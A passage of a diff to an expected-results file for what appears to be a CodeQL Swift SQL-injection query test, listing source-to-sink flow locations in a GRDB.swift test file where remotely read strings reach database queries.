remoteString | semmle.label | remoteString | +| GRDB.swift:349:84:349:84 | remoteString | semmle.label | remoteString | +| GRDB.swift:350:69:350:69 | remoteString | semmle.label | remoteString | +| GRDB.swift:351:84:351:84 | remoteString | semmle.label | remoteString | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | | SQLite.swift:73:17:73:17 | unsafeQuery1 | semmle.label | unsafeQuery1 | | SQLite.swift:74:17:74:17 | unsafeQuery2 | semmle.label | unsafeQuery2 | @@ -231,63 +244,69 @@ subpaths | GRDB.swift:149:29:149:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:149:29:149:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | | GRDB.swift:150:29:150:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:150:29:150:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | | GRDB.swift:151:29:151:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:151:29:151:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:166:33:166:33 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:166:33:166:33 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:169:32:169:32 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:169:32:169:32 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:172:37:172:37 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:172:37:172:37 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:180:36:180:36 | remoteString | GRDB.swift:178:26:178:80 | call to String.init(contentsOf:) : | GRDB.swift:180:36:180:36 | remoteString | This query depends on a $@. | GRDB.swift:178:26:178:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:188:41:188:41 | remoteString | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:188:41:188:41 | remoteString | This query depends on a $@. | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:189:44:189:44 | remoteString | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:189:44:189:44 | remoteString | This query depends on a $@. | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:190:47:190:47 | remoteString | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:190:47:190:47 | remoteString | This query depends on a $@. | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:191:47:191:47 | remoteString | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:191:47:191:47 | remoteString | This query depends on a $@. | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:203:37:203:37 | remoteString | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:203:37:203:37 | remoteString | This query depends on a $@. | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:204:37:204:37 | remoteString | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:204:37:204:37 | remoteString | This query depends on a $@. | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:208:37:208:37 | remoteString | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:208:37:208:37 | remoteString | This query depends on a $@. | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:209:37:209:37 | remoteString | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:209:37:209:37 | remoteString | This query depends on a $@. | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:213:36:213:36 | remoteString | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:213:36:213:36 | remoteString | This query depends on a $@. | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:214:36:214:36 | remoteString | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:214:36:214:36 | remoteString | This query depends on a $@. | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:223:38:223:38 | remoteString | GRDB.swift:221:26:221:80 | call to String.init(contentsOf:) : | GRDB.swift:223:38:223:38 | remoteString | This query depends on a $@. | GRDB.swift:221:26:221:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:231:32:231:32 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:231:32:231:32 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:232:32:232:32 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:232:32:232:32 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:233:32:233:32 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:233:32:233:32 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:234:32:234:32 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:234:32:234:32 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:240:29:240:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:240:29:240:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:241:29:241:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:241:29:241:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:242:29:242:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:242:29:242:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:243:29:243:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:243:29:243:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:249:29:249:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:249:29:249:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:250:29:250:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:250:29:250:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:251:29:251:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:251:29:251:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:252:29:252:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:252:29:252:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:258:29:258:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:258:29:258:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:259:29:259:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:259:29:259:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:260:29:260:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:260:29:260:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:261:29:261:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:261:29:261:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:272:53:272:53 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:272:53:272:53 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:273:53:273:53 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:273:53:273:53 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:274:53:274:53 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:274:53:274:53 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:275:53:275:53 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:275:53:275:53 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:281:50:281:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:281:50:281:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:282:50:282:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:282:50:282:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:283:50:283:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:283:50:283:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:284:50:284:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:284:50:284:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:290:50:290:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:290:50:290:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:291:50:291:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:291:50:291:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:292:50:292:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:292:50:292:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:293:50:293:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:293:50:293:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:299:50:299:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:299:50:299:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:300:50:300:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:300:50:300:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:301:50:301:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:301:50:301:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:302:50:302:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:302:50:302:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:313:57:313:57 | remoteString | GRDB.swift:311:26:311:80 | call to String.init(contentsOf:) : | GRDB.swift:313:57:313:57 | remoteString | This query depends on a $@. | GRDB.swift:311:26:311:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:314:57:314:57 | remoteString | GRDB.swift:311:26:311:80 | call to String.init(contentsOf:) : | GRDB.swift:314:57:314:57 | remoteString | This query depends on a $@. | GRDB.swift:311:26:311:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:323:51:323:51 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:323:51:323:51 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:324:51:324:51 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:324:51:324:51 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:325:66:325:66 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:325:66:325:66 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:326:66:326:66 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:326:66:326:66 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:327:69:327:69 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:327:69:327:69 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:328:84:328:84 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:328:84:328:84 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:329:69:329:69 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:329:69:329:69 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:330:84:330:84 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:330:84:330:84 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:166:32:166:32 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:166:32:166:32 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:167:39:167:39 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:167:39:167:39 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:168:49:168:49 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:168:49:168:49 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:169:38:169:38 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:169:38:169:38 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:170:22:170:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:170:22:170:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:172:22:172:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:172:22:172:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:187:33:187:33 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) : | GRDB.swift:187:33:187:33 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:190:32:190:32 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) : | GRDB.swift:190:32:190:32 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:193:37:193:37 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) : | GRDB.swift:193:37:193:37 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:201:36:201:36 | remoteString | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) : | GRDB.swift:201:36:201:36 | remoteString | This query depends on a $@. | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:209:41:209:41 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) : | GRDB.swift:209:41:209:41 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:210:44:210:44 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) : | GRDB.swift:210:44:210:44 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:211:47:211:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) : | GRDB.swift:211:47:211:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:212:47:212:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) : | GRDB.swift:212:47:212:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:224:37:224:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) : | GRDB.swift:224:37:224:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:225:37:225:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) : | GRDB.swift:225:37:225:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:229:37:229:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) : | GRDB.swift:229:37:229:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:230:37:230:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) : | GRDB.swift:230:37:230:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:234:36:234:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) : | GRDB.swift:234:36:234:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:235:36:235:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) : | GRDB.swift:235:36:235:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:244:38:244:38 | remoteString | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) : | GRDB.swift:244:38:244:38 | remoteString | This query depends on a $@. | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:252:32:252:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:252:32:252:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:253:32:253:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:253:32:253:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:254:32:254:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:254:32:254:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:255:32:255:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:255:32:255:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:261:29:261:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:261:29:261:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:262:29:262:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:262:29:262:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:263:29:263:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:263:29:263:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:264:29:264:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:264:29:264:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:270:29:270:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:270:29:270:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:271:29:271:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:271:29:271:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:272:29:272:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:272:29:272:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:273:29:273:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:273:29:273:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:279:29:279:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:279:29:279:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:280:29:280:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:280:29:280:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:281:29:281:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:281:29:281:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:282:29:282:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:282:29:282:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:293:53:293:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:293:53:293:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:294:53:294:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:294:53:294:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:295:53:295:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:295:53:295:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:296:53:296:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:296:53:296:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:302:50:302:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:302:50:302:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:303:50:303:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:303:50:303:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:304:50:304:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:304:50:304:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:305:50:305:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:305:50:305:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:311:50:311:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:311:50:311:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:312:50:312:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:312:50:312:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:313:50:313:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:313:50:313:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:314:50:314:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:314:50:314:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:320:50:320:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:320:50:320:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:321:50:321:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:321:50:321:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:322:50:322:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:322:50:322:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:323:50:323:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:323:50:323:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:334:57:334:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) : | GRDB.swift:334:57:334:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:335:57:335:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) : | GRDB.swift:335:57:335:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:344:51:344:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:344:51:344:51 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:345:51:345:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:345:51:345:51 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:346:66:346:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:346:66:346:66 | remoteString | This query depends on a $@. | 